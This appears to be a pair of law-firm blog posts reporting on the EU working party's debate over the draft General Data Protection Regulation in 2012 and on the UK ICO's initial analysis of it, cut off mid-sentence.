On 23 and 24 February 2012, the General Secretariat to the EU presented the proposed Data Protection Regulation to the EU Working Party on Information Exchange and Data Protection (DAPIX), stating that the new proposals were motivated by the European Commission’s (EC) desire to stimulate growth across the EU and the need to protect the fundamental rights of European citizens. The EC’s justification for the proposed overhaul of existing European data privacy legislation was triggered by technological developments that have taken place since the 1995 EU Data Protection Directive, and the global trend towards a digital economy.

In addition, the General Secretariat distributed to the delegates a comparative table of the first 21 articles of the draft General Data Protection Regulation against the 1995 Directive.

The EC set out four key objectives underlying the proposal for a Data Protection Regulation: (1) stimulation of growth through the uniform application of data protection rules across the EU; (2) protection of fundamental rights; (3) adoption of flexible legal instruments capable of adapting to future technologies; and (4) legal certainty.

A summary of the discussions was published on 8 March 2012. Delegates of the DAPIX raised various issues with the draft Regulation, including that the Commission could have been more radical in its proposals. In contrast, many of the DAPIX delegates raised serious concerns about the draft Regulation, fearing that it would increase the administrative burden on organizations and public authorities.

Concerns were raised about obligations on small and medium-sized businesses, the specific obligation on organizations with more than 250 employees to appoint a data protection officer, and rules applicable to individuals rather than utilizing a more risk-based approach.

DAPIX also reviewed the proposed legislative instruments of a Regulation and Directive on data protection in law enforcement, with some of the delegates stating they would have preferred another directive on the basis that a regulation could be too prescriptive.

DAPIX also criticized the delegated powers of the EC under the draft Regulation on the basis that there was an unbalanced division of power between the legislator (the European Council and Parliament) and the EC, which could undermine the desire to simplify data protection rules, and that such delegated acts could lead to modification of the EU Member States’ national legislation.

The delegates also raised strong reservations surrounding the geographical scope concerning the ‘one-stop shop’ principle that makes one Data Processing Authority (DPA) competent for all data processing operations throughout the EU, fearing that organizations would then forum shop, and that it would create an excessive administrative burden on some national DPAs. Other delegates, however, welcomed the ‘one-stop shop’ principle.

Delegates raised additional concerns about whether the draft Regulation is sufficiently technology-neutral, and whether concepts such as the right to be forgotten and the right to data portability were technically feasible, as well as the possible overlap with the e-Privacy Directive.

The Information Commissioner's Office publishes its initial analysis of the European Commission's legislative proposals for the protection of individuals with regard to the processing of personal data.

This post was written by Cynthia O'Donoghue.

The ICO has published its initial analysis of the European Commission’s reform of the EU Data Protection Directive 95/46/EC ("the Directive"). The ICO published its review of the draft Data Protection Regulation and the Directive on data protection in law enforcement ("DP Framework") on 25 January 2012, but was quick to stress that its review is not a comprehensive analysis, nor will it be the ICO’s last word on the subject.

The ICO views the Commission’s proposals as a “positive contribution” towards updating data protection law in light of the current “patchwork” national laws, and because the existing Directive is “out-of-date”. The ICO, however, would prefer a single comprehensive instrument to the two documents contained in the DP Framework. If two instruments do remain, then the ICO would like to see the EU Parliament ensure as much consistency as possible between them; otherwise, there could be a lack of consistency, which would undermine one of the European Commission’s objectives for revising the existing Directive.

The ICO points to the following concerns:

  • Consistency, while welcome, may never be truly possible because of the variations between different member states
  • The drive for harmonisation could become a burden on businesses and lead to complexity for individuals
  • The DP Framework is more detailed and prescriptive than the Directive and, as a result, could be onerous or disproportionate, whereas a flexible instrument may be more suitable

The ICO reviewed a selection of the 91 articles of the proposed EU DP Regulation, praising the expanded definitions of "